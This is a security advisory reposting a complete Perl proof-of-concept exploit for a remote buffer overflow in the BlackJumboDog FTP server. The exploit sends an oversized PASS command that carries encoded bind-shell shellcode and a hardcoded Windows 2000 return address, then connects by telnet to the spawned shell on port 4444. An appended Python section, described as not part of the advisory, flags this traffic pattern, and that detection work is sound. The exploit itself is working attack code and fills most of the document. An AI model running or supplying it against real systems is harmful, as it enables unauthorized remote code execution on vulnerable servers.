[EXPL] BlackJumboDog Remote Buffer Overflow Exploit Code

2004-08-06T00:00:00
ID SECURITYVULNS:DOC:6584
Type securityvulns
Reporter Securityvulns
Modified 2004-08-06T00:00:00

Description

The following security advisory was sent to the SecuriTeam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



BlackJumboDog Remote Buffer Overflow Exploit Code

SUMMARY

A remote buffer overflow was found and reported in our previously featured article 'BlackJumboDog FTP Server Buffer Overflow' (http://www.securiteam.com/windowsntfocus/5AP040ADPW.html).

The following proof-of-concept script can help test the vulnerability against potentially vulnerable servers.

DETAILS

Exploit:

#!/usr/bin/perl
# blackJumboDog Exploit code by Tal zeltzer

use strict;
use IO::Socket::INET;

usage() unless(@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ]
# http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

print "[+] Connected to host\r\n";

$socket->autoflush(1);

# receive banner
my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);

# send USER command
my $username = "anonymous";
print $socket "USER $username\r\n";

$repcode = "";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

# Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )
printf "[+] Sending shellcode\r\n";

my $buf = "A"x308;
$buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf = $buf . "\x60\x2F\x4E\x7C";
$buf = $buf . $shellcode;
print $socket "PASS $buf\r\n";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

$repcode = "";
recv_reply($socket, $repcode);

close($socket);

system("telnet $host 4444");

exit(0);

sub usage {
    # print usage information
    print "\nUsage: jumbo.pl <host> <port>\n <host> - The host to connect to <port> - The TCP port\n\n";
    exit(1);
}

sub recv_reply {
    # retrieve any reply
    my $socket = shift;
    my $repcode = shift;
    $socket or die "Can't receive on socket\n";

    my $res="";
    while(<$socket>) {
        $res .= $_;
        if (/$repcode/) { last; }
    }
    return $res;
}
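A defender-side check for the traffic pattern the proof-of-concept produces, added here as an example that is not part of the advisory or of the PoC: it parses raw FTP command lines and flags an argument that is oversized, contains non-printable bytes, or carries a long run of a single filler byte (the three traits of a PASS line built from 308 bytes of padding plus binary code). The sample command lines and the thresholds MAX_ARG_LEN and MIN_FILLER_RUN are assumptions constructed for this example.

```python
import re

# Constructed sample FTP command lines (not taken from the advisory or from any
# capture). The last one has the shape the advisory describes: a PASS argument
# of 308 filler bytes followed by a binary tail.
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"PASS " + b"A" * 308 + bytes(range(0xD0, 0xF0)) + b"\r\n",
]

# Assumed thresholds: no legitimate username or password comes near 308 bytes,
# and printable credentials never contain a 100-byte run of one character.
MAX_ARG_LEN = 128
MIN_FILLER_RUN = 100

def parse_ftp_command(line: bytes) -> tuple[bytes, bytes]:
    """Split one raw FTP command line into (upper-cased verb, argument)."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper(), arg

def inspect_ftp_command(line: bytes) -> list[str]:
    """Return the findings for one command line; an empty list means nothing odd."""
    verb, arg = parse_ftp_command(line)
    name = verb.decode("ascii", "replace")
    findings = []
    # 1. Oversized argument: the PoC needs 308 bytes just to reach the saved EIP.
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"{name}: argument length {len(arg)} exceeds {MAX_ARG_LEN}")
    # 2. Non-printable bytes: a jump stub, a return address and shellcode are
    #    binary, whereas FTP command arguments are expected to be printable ASCII.
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint:
        findings.append(f"{name}: {nonprint} non-printable bytes in argument")
    # 3. Long run of one repeated byte: the padding used to reach the overwrite.
    m = re.search(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), arg, re.DOTALL)
    if m:
        findings.append(f"{name}: {len(m.group(0))}-byte run of {m.group(1)!r}")
    return findings

def scan_ftp_session(lines) -> dict[int, list[str]]:
    """Inspect every command of a session; map 1-based line index to its findings."""
    return {i: f for i, line in enumerate(lines, 1) if (f := inspect_ftp_command(line))}

if __name__ == "__main__":
    for idx, findings in scan_ftp_session(SAMPLE_COMMANDS).items():
        for f in findings:
            print(f"line {idx}: {f}")
```

The same three checks apply unchanged to USER and other command verbs, so the scan covers overflows in any FTP argument rather than only PASS.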

ADDITIONAL INFORMATION

The information has been provided by Tal Zeltzer of SecuriTeam Experts (expert@securiteam.com).


DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.